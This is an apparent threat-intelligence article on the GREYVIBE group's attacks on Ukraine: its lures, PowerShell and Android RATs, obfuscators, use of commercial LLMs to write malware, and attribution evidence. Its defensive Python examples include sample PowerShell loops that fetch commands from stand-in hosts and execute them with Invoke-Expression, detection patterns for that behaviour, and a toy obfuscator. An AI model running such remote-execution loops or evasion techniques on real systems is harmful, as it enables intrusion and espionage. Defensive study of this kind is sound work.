The convergence of geopolitical conflict and widely available generative AI tooling has produced a fluid threat landscape in which traditional attribution boundaries are increasingly blurred. Cybersecurity research has exposed a persistent, multi-vector activity set run by a threat group designated GREYVIBE. Operating since at least August 2025, this Russia-nexus adversary has aggressively targeted Ukrainian military, governmental, civilian, and commercial infrastructure. What distinguishes GREYVIBE from historical advanced persistent threats (APTs) is not a high baseline of engineering sophistication but its systematic integration of generative artificial intelligence (GenAI) and large language models (LLMs) across the entire software development and attack lifecycle. By using commercial LLMs to bridge gaps in its own technical capability, the group sustains a rapid operational tempo, spinning up custom loaders, obfuscation layers, and custom remote access trojans (RATs) faster than signature-based detection can keep pace.

Deconstructing the Multi-Vector Delivery Architecture
GREYVIBE relies on a diversified set of initial access campaigns that pair tailored social engineering lures with a uniform decoy-and-payload execution pattern: a credible document is shown to the victim while code runs in the background. The first core delivery mechanism, tracked as PhantomMail, is an ongoing spear-phishing pipeline targeting strategic Ukrainian entities, including energy providers, the Kyiv City Council, the Main Directorate of the State Emergency Service, and the State Service of Special Communications and Information Protection. These phishing emails carry links to malicious ZIP or RAR archives hosted on third-party file-sharing infrastructure such as Google Drive and 4sync. Once extracted and opened, the archive contents launch JavaScript- or PyInstaller-based loaders that display a benign decoy document while silently staging the next-stage payload.
Simultaneously, the threat actor has experimented with PhantomClick, a campaign leveraging “ClickFix” infrastructure where compromised or fraudulent domains masquerade as legitimate Zoom conferences or Latvian Platform for Development Cooperation (LAPAS) verification gateways. When a target lands on these custom landing pages, they are prompted via localized Ukrainian text to execute specific terminal commands under the guise of completing a Cloudflare security verification check. In reality, this action executes a malicious payload chain directly within the host operating system.
The most persistent and targeted initial access vector observed is the PrincessClub infrastructure. This campaign uses fraudulent adult-entertainment websites localized specifically to lure Ukrainian combatants, particularly around heavily contested operational zones such as Kharkiv. The operators deploy artificial female personas across localized Telegram dating groups to conduct targeted human intelligence (HUMINT) staging, gradually building trust before routing victims to credential harvesting or malware delivery portals. Later iterations of these PrincessClub portals integrated WebRTC-based live call functionality; post-infection, these components turn the decoy landing page into a real-time audio and video interception node, a serious operational security threat for the personnel using the device.
Beyond these channels, the infrastructure extends to campaigns like DroneLink and Nebo. DroneLink, deployed between March and April 2026, uses fraudulent military charity foundations masquerading as support groups for the Armed Forces of Ukraine (specifically FPV drones and unmanned aerial vehicle procurement). Nebo relies on a Russian-language lure (“СПО НЕБО”, roughly “NEBO special-purpose software”) that presents a false login screen mimicking tactical military software. This component hardcodes automated telephone exchange (“ATC-P”) routing codes consistent with the secure defense communications networks used inside the Russian military apparatus. The implementation is deliberately designed to convince Ukrainian defense personnel that they are accessing a compromised or exposed Russian tactical terminal, a nuanced psychological manipulation vector.

Technical Dissection of the Custom Malware Ecosystem
The primary payload pipeline used by GREYVIBE is divided across three core custom-developed families: PhantomRelay, LegionRelay, and FallSpy. PhantomRelay is a modular, PowerShell-based remote access trojan built around a strict two-stage operational framework. The first stage runs an extensive system fingerprinting script that gathers target environment telemetry before retrieving the second stage, the main RAT client. Command and control (C2) runs over persistent WebSocket connections, allowing operators to feed dynamic PowerShell commands and external extension scripts straight into memory; because the command payload is never written to disk, file-based scanners have nothing to hash.
Analysis of this specific codebase revealed a distinct evolutionary lineage. A base variant, designated as PhantomRelayLite, was discovered across multiple seemingly disparate cybercriminal operations, including a Microsoft Teams voice-phishing (vishing) operation and a KongTuke ClickFix campaign. GREYVIBE weaponized this foundation into PhantomRelayV1, which integrated a specialized watchdog persistence architecture and migrated to the group’s custom DAYLIGHT obfuscator. This was later succeeded by PhantomRelayV2, which completely refactored the structural codebase while preserving the underlying WebSocket-based C2 communication logic.

[Target Environment]
        │
        ├── (Initial Access: PhantomMail / PhantomClick / PrincessClub)
        │
        └───► [Stage 1: Fingerprinting Script]
                      │
                      └───► [Stage 2: Main PhantomRelay Client]
                                    │
                                    ▼
                      [Persistent WebSockets C2] ◄───► (Dynamic Extension Scripts)

For mobile tracking operations, GREYVIBE deploys FallSpy, a highly intrusive Android spyware framework active since August 2025. Typically dropped via the PrincessClub or Nebo mobile vectors, FallSpy maintains a dual-state operational model: it presents functional decoy views to the user while concurrently spawning background services that scrape contacts, SMS logs, installed-application metadata, SIM card parameters, active Wi-Fi SSIDs, geographic coordinates, and on-device media, and exfiltrate them to designated C2 endpoints.

On Windows endpoints, operators deploy LegionRelay, a highly streamlined, lightweight PowerShell RAT that relies entirely on REST API methods for its C2 check-in loops. The client-side footprint of LegionRelay is minimally designed, serving primarily as an execution conduit for heavily obfuscated post-compromise frameworks. Operators have been observed using LegionRelay to systematically execute file system enumeration, data exfiltration, automated desktop screenshot captures, browser credential theft, and targeted exfiltration of session data for secure chat applications including Telegram and WhatsApp, alongside setting up unauthorized Remote Desktop Protocol (RDP) backdoors.
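Both PowerShell RATs described above share one defining behaviour: a long-lived network primitive (a WebSocket client for PhantomRelay, a REST polling loop for LegionRelay) whose output is handed to Invoke-Expression, so the malicious code never touches disk. That behaviour is visible in PowerShell script block logging (Event ID 4104) even when the file-level artefacts change with every packer rotation. The following triage routine is an added example written for this article, not code or signatures from the GREYVIBE samples or from WithSecure; the indicator patterns, weights and the three sample script blocks are constructed for illustration, and the C2 hostnames use the reserved .invalid domain.

```python
import re
from typing import Dict, List

# Constructed heuristics for the tradecraft described in the text: a network-fetching
# primitive (WebSocket client or REST beacon) paired with dynamic evaluation of the
# fetched text. These are illustrative patterns, not GREYVIBE-specific signatures.
INDICATORS: Dict[str, str] = {
    "websocket_client": r"ClientWebSocket|System\.Net\.WebSockets",
    "rest_beacon":      r"Invoke-RestMethod|Invoke-WebRequest|Net\.WebClient",
    "sleep_loop":       r"\bwhile\b[\s\S]*Start-Sleep|Start-Sleep[\s\S]*\bwhile\b",
    "dynamic_eval":     r"Invoke-Expression|\bIEX\b",
    "base64_decode":    r"FromBase64String",
    "hidden_window":    r"-WindowStyle\s+Hidden|-w\s+hidden\b",
}
WEIGHTS = {"websocket_client": 2, "rest_beacon": 1, "sleep_loop": 1,
           "dynamic_eval": 3, "base64_decode": 1, "hidden_window": 1}
COMPILED = {name: re.compile(pat, re.IGNORECASE) for name, pat in INDICATORS.items()}


def triage(script_text: str):
    """Return (score, sorted list of matched indicator names) for one script block."""
    matched = sorted(name for name, rx in COMPILED.items() if rx.search(script_text))
    return sum(WEIGHTS[m] for m in matched), matched


def is_suspicious(matched: List[str]) -> bool:
    # Remote input evaluated as code is the behaviour both RATs depend on, so the
    # verdict requires a fetch primitive AND dynamic evaluation in the same block.
    fetches = {"websocket_client", "rest_beacon"} & set(matched)
    return bool(fetches) and "dynamic_eval" in matched


def triage_events(events):
    """Score a list of 4104-style records shaped {'script_block_id': str, 'text': str}."""
    results = []
    for ev in events:
        score, matched = triage(ev["text"])
        results.append({"script_block_id": ev["script_block_id"], "score": score,
                        "suspicious": is_suspicious(matched), "matched": matched})
    return results


# Constructed sample script blocks (not real telemetry): a WebSocket-fed RAT loop,
# a REST beacon loop with base64-wrapped tasking, and a benign admin script.
SAMPLE_EVENTS = [
    {"script_block_id": "blk-1", "text": """
$ws = New-Object System.Net.WebSockets.ClientWebSocket
$ws.ConnectAsync([Uri]'wss://relay.example.invalid/ws', [Threading.CancellationToken]::None).Wait()
while ($ws.State -eq 'Open') {
  $buf = New-Object byte[] 65536
  $res = $ws.ReceiveAsync([ArraySegment[byte]]$buf, [Threading.CancellationToken]::None).Result
  $cmd = [Text.Encoding]::UTF8.GetString($buf, 0, $res.Count)
  Invoke-Expression $cmd
}
"""},
    {"script_block_id": "blk-2", "text": """
while ($true) {
  $task = Invoke-RestMethod -Uri 'https://api.example.invalid/task' -UseBasicParsing
  if ($task) { IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($task))) }
  Start-Sleep -Seconds 30
}
"""},
    {"script_block_id": "blk-3", "text": """
$release = Invoke-RestMethod -Uri 'https://api.example.invalid/releases/latest'
Write-Host "Latest version: $($release.tag_name)"
"""},
]

if __name__ == "__main__":
    for r in triage_events(SAMPLE_EVENTS):
        print(r["script_block_id"], r["score"], r["suspicious"], r["matched"])
```

The score is deliberately secondary to the boolean verdict: a benign deployment script that calls Invoke-RestMethod will match the beacon pattern, but it will not also evaluate the response as code. When rolling this into a production rule, tune it against your own 4104 baseline, because legitimate frameworks that download and Invoke-Expression installer scripts will trip the same combination.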

Obfuscation Engineering and Cryptographic Loaders
To counter continuous detection mechanisms implemented by modern Endpoint Detection and Response (EDR) platforms, GREYVIBE maintains a dedicated development cycle centered around rotating custom obfuscators and loader utilities. The group’s early deployment phases relied heavily on LOOKVALPS (a specialized PowerShell engine) and LOOKVALJS (a companion JavaScript obfuscation packer). As blue-team detection strategies evolved, the group engineered a complete migration pathway in October 2025, introducing DAYLIGHT, a highly randomized PowerShell obfuscator that was applied extensively across both early-stage delivery stagers and post-compromise tooling extensions. By March 2026, the group supplemented this toolset with TEASOUP, a complex JavaScript obfuscator built to succeed the aging LOOKVALJS codebase.
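Rotating an obfuscator changes every byte of the delivered file without changing what the script does, which is exactly why hash-based blocking lags behind packer rotation. The following block is an added example written for this article, not DAYLIGHT, LOOKVALPS or any other GREYVIBE code: it implements a deliberately simple stand-in obfuscator (random variable renaming plus a junk comment), shows that two "rotations" of the same beacon-style script produce different SHA-256 hashes, and then shows a structural fingerprint (comments stripped, variables replaced by positional placeholders, whitespace and case normalized) that is identical across rotations. The sample script, the reserved-variable list and the normalization rules are constructed assumptions; real obfuscators also flatten control flow and split strings, which this toy does not attempt.

```python
import hashlib
import random
import re
import string

# PowerShell automatic/special variables that a renaming pass must leave untouched.
# Constructed list for this example; extend it for your own environment.
RESERVED = {"_", "true", "false", "null", "args", "input", "this", "env",
            "psitem", "error", "host", "pid", "pwd", "home"}
VAR_RX = re.compile(r"\$([A-Za-z_][A-Za-z0-9_]*)")

# Constructed beacon-style script used only as input to the toy obfuscator.
SAMPLE_SCRIPT = """\
$target = 'https://api.example.invalid/task'
$interval = 30
while ($true) {
    $task = Invoke-RestMethod -Uri $target
    if ($task) { Invoke-Expression $task }
    Start-Sleep -Seconds $interval
}
"""


def rename_identifiers(script: str, seed: int) -> str:
    """One 'rotation' of the toy obfuscator: random variable names plus a junk comment."""
    rng = random.Random(seed)
    mapping = {}

    def fresh_name() -> str:
        while True:
            name = "".join(rng.choice(string.ascii_letters) for _ in range(10))
            if name not in mapping.values():
                return name

    def sub(m: re.Match) -> str:
        name = m.group(1)
        if name.lower() in RESERVED:
            return m.group(0)
        if name not in mapping:
            mapping[name] = fresh_name()
        return "$" + mapping[name]

    junk = "# " + "".join(rng.choice(string.ascii_lowercase) for _ in range(24))
    return junk + "\n" + VAR_RX.sub(sub, script)


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def normalized_fingerprint(script: str) -> str:
    """Structural fingerprint: drop full-line comments, map each user variable to a
    positional placeholder ($V0, $V1, ...), collapse whitespace, lowercase, hash.
    Scripts that differ only in identifier names and junk comments collide here."""
    lines = [ln for ln in script.splitlines() if not ln.lstrip().startswith("#")]
    order = {}

    def sub(m: re.Match) -> str:
        name = m.group(1)
        if name.lower() in RESERVED:
            return m.group(0)
        if name not in order:
            order[name] = len(order)
        return f"$V{order[name]}"

    text = VAR_RX.sub(sub, "\n".join(lines))
    text = re.sub(r"\s+", " ", text).strip().lower()
    return sha256_hex(text)


if __name__ == "__main__":
    a = rename_identifiers(SAMPLE_SCRIPT, seed=1)
    b = rename_identifiers(SAMPLE_SCRIPT, seed=2)
    print("file hashes differ:    ", sha256_hex(a) != sha256_hex(b))
    print("fingerprints identical:", normalized_fingerprint(a) == normalized_fingerprint(b))
```

The fingerprint survives this toy because renaming preserves the order in which variables first appear; a packer that also reorders statements or splits strings defeats it, which is the point of the text above: structural normalization buys a little ground against rotation, but durable coverage comes from the runtime behaviour (script block logging, AMSI, network telemetry) that the rotation does not alter.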
The rapid implementation and structurally distinct layouts of these custom packers point to an optimized development pipeline. Technical markers indicate that these obfuscation routines do not follow traditional manual coding patterns or established open-source templates. Instead, the logic points heavily toward automated code generation, where variable randomization, control flow flattening, and functional layering are handled programmatically. Because every packer rotation changes the bytes of the delivered file, file-hash matching and shallow static heuristics generally fail to flag incoming payloads before execution begins; detection has to key on what the script does once it runs rather than on what it looks like on disk.

Generative AI as an Operational Enabler
The hallmark of GREYVIBE's operational profile is its systematic, platform-wide integration of generative AI (GenAI) and large language models (LLMs) across every critical phase of the attack lifecycle. Intelligence analysis indicates active use of multiple commercial GenAI services, including Ideogram AI for automated image synthesis and ChatGPT and Google Gemini for software development tasks. In the resource development phase, the group relies on these LLMs to write and refine complex scripts, build out the full-stack backend for the LegionRelay C2 framework, and draft configuration scripts for target server environments. Post-compromise, the operators similarly use LLMs to generate context-dependent scripts and administrative utilities on the fly, tailored to the system parameters harvested during initial host fingerprinting.
This reliance on AI cuts both ways, however. While LLMs let the group accelerate development and offset significant gaps in technical capability, they also introduce structural weaknesses into its software. WithSecure identified critical logic and design flaws in the LegionRelay backend, errors characteristic of AI-generated code that has not been rigorously reviewed by a human. These implementation flaws inadvertently exposed a limited subset of LegionRelay's internal server functionality, giving defensive researchers an unintended window of visibility over an extended monitoring period. That telemetry ultimately allowed analysts to map the actor's broader victimology, active operational directives, and precise post-compromise behavior without the group realizing its backend had been exposed.

Attribution Ambiguity and Hybrid Threat Profiles
GREYVIBE's operational positioning and geopolitical alignment point clearly toward a Russian state nexus, though its composition remains deeply intertwined with the broader cybercriminal ecosystem. Forensic artifacts indicate that the developers and operators are native Russian speakers who work on Moscow time (UTC+3). This assessment is supported by extensive Russian-language comments in active backend source files, Russian locale settings on developer machines, and empirical tracking showing that post-compromise activity spikes during standard Moscow business hours. The strategic targeting priorities, heavily weighted toward Ukrainian government, energy, and defense targets, align with state-directed intelligence collection mandates in the context of the active regional conflict.
┌─────────────────────────────────────────────────────────────────────┐
│                        GREYVIBE ATTRIBUTION                         │
└──────────────────────────────────┬──────────────────────────────────┘
                                   │
                 ┌─────────────────┴─────────────────┐
                 ▼                                   ▼
┌─────────────────────────────────┐ ┌─────────────────────────────────┐
│ RUSSIAN STATE INTERESTS         │ │ CYBERCRIME ECOSYSTEM            │
├─────────────────────────────────┤ ├─────────────────────────────────┤
│ • Targeted Ukrainian Logistics  │ │ • TrickBot / UAC-0098 ISO Tools │
│ • Intelligence & Surveillance   │ │ • Shared PhantomRelayLite Base  │
│ • Moscow Business Hours (UTC+3) │ │ • XMRig Crypto-Miner Payloads   │
│ • Localized Secure Defense Lures│ │ • Slang Variables (e.g., 'uwu') │
└─────────────────────────────────┘ └─────────────────────────────────┘
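The "Moscow business hours" line in the attribution box rests on a concrete analytic step: convert each post-compromise event timestamp to candidate local time zones and see which offset makes the activity look most like a working week. The routine below is an added example written for this article, not WithSecure's analysis code, and the fourteen event timestamps are constructed so that the example runs offline; the business-hours window (Mon-Fri, 09:00 to 18:00 local) and the whole-hour offset scan are assumptions of the example.

```python
from datetime import datetime, timedelta, timezone
from typing import List, Tuple

# Constructed post-compromise event timestamps in UTC (ISO 8601). Not real telemetry:
# twelve weekday events, one Saturday event and one late-evening event.
SAMPLE_EVENTS_UTC: List[str] = [
    "2026-03-02T06:05:00+00:00", "2026-03-02T06:40:00+00:00", "2026-03-02T08:20:00+00:00",
    "2026-03-03T06:15:00+00:00", "2026-03-03T10:50:00+00:00", "2026-03-03T14:30:00+00:00",
    "2026-03-04T06:30:00+00:00", "2026-03-04T13:10:00+00:00",
    "2026-03-05T07:00:00+00:00", "2026-03-05T14:45:00+00:00",
    "2026-03-06T06:10:00+00:00", "2026-03-06T14:50:00+00:00",
    "2026-03-07T09:00:00+00:00",  # Saturday
    "2026-03-02T20:30:00+00:00",  # late Monday evening
]

WORK_START, WORK_END = 9, 18  # assumed local business hours, [09:00, 18:00)


def to_local(ts: str, offset_hours: int) -> datetime:
    """Re-express a UTC ISO 8601 timestamp in a fixed whole-hour UTC offset."""
    return datetime.fromisoformat(ts).astimezone(timezone(timedelta(hours=offset_hours)))


def business_hours_fraction(timestamps: List[str], offset_hours: int) -> float:
    """Share of events falling Mon-Fri within business hours at the given offset."""
    hits = 0
    for ts in timestamps:
        local = to_local(ts, offset_hours)
        if local.weekday() < 5 and WORK_START <= local.hour < WORK_END:
            hits += 1
    return hits / len(timestamps)


def best_offset(timestamps: List[str]) -> Tuple[int, float]:
    """Scan every whole-hour UTC offset and return the one whose business-hours
    window explains the most activity. Ties resolve to the smallest offset."""
    scored = [(business_hours_fraction(timestamps, off), -off, off) for off in range(-12, 15)]
    frac, _, off = max(scored)
    return off, frac


def hour_histogram(timestamps: List[str], offset_hours: int) -> List[int]:
    """Event count per local hour (0-23); useful for eyeballing a lunch dip or a shift end."""
    counts = [0] * 24
    for ts in timestamps:
        counts[to_local(ts, offset_hours).hour] += 1
    return counts


if __name__ == "__main__":
    off, frac = best_offset(SAMPLE_EVENTS_UTC)
    print(f"best-fitting offset: UTC{off:+d} ({frac:.0%} of events in business hours)")
    print("same data read as UTC+0:", f"{business_hours_fraction(SAMPLE_EVENTS_UTC, 0):.0%}")
    print("hourly histogram at best offset:", hour_histogram(SAMPLE_EVENTS_UTC, off))
```

On its own this is a weak signal: UTC+3 also covers Istanbul, Minsk and the Gulf states, a disciplined actor can shift its working day, and a small sample will fit several offsets almost equally well. It carries weight in the attribution picture above only because it agrees with the independent artefacts (source-code comments, developer locale settings, lure language) that the text lists beside it.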
Concurrently, the group's technical DNA overlaps significantly with profit-driven cybercrime infrastructure. Early development samples used a specialized, proprietary ISO construction utility historically tied to the TrickBot ecosystem and to UAC-0098, an activity cluster largely composed of former TrickBot developers targeting Ukrainian organizations. Additional anomalies include frequent operator mistakes, such as uploading active test and development binaries to public multi-scanner services like VirusTotal, and informal internet-slang variable names (e.g., "letsrollboyos", "totallyunsus", and "cuteuwu"). Furthermore, XMRig cryptocurrency miners were dropped onto a small subset of LegionRelay-compromised machines, an operational profile out of character for disciplined state-backed intelligence teams. Taken together, this indicates a hybrid operational architecture in which state-directed operations are executed by co-opted, contracted, or newly integrated cybercriminal elements.

Our Opinion on the GREYVIBE Case
The emergence of GREYVIBE highlights a significant and dangerous shift in the modern threat landscape: the democratization of cyber warfare through generative AI. Traditionally, nation-state operations required massive capital investments and highly specialized developer cadres to build unique, modular implants. By weaponizing large language models like ChatGPT and Google Gemini, low-to-moderately sophisticated threat actors can bypass historical capability barriers, rapidly iterating custom obfuscators like DAYLIGHT and TEASOUP to disrupt signature-based detection.
However, this reliance on AI exposes a fundamental paradox. While LLMs accelerate operational tempo and lure engineering—as seen in the highly deceptive PrincessClub and Nebo campaigns—they also introduce systemic vulnerabilities. The design flaws uncovered in LegionRelay’s backend demonstrate that AI-generated code frequently suffers from logical oversight, granting defenders extended telemetry and unexpected visibility.
Furthermore, GREYVIBE’s blend of Russian state-aligned intelligence objectives with cybercriminal hallmarks, such as XMRig deployment and TrickBot infrastructure overlaps, suggests a hybrid threat model. In our opinion, the state co-optation of low-tier criminal elements armed with commercial AI creates highly volatile, unpredictable threat vectors. Security architectures must evolve beyond static file-based indicators, focusing instead on behavior-centric telemetry capable of catching rapidly evolving, AI-assisted malicious pipelines.
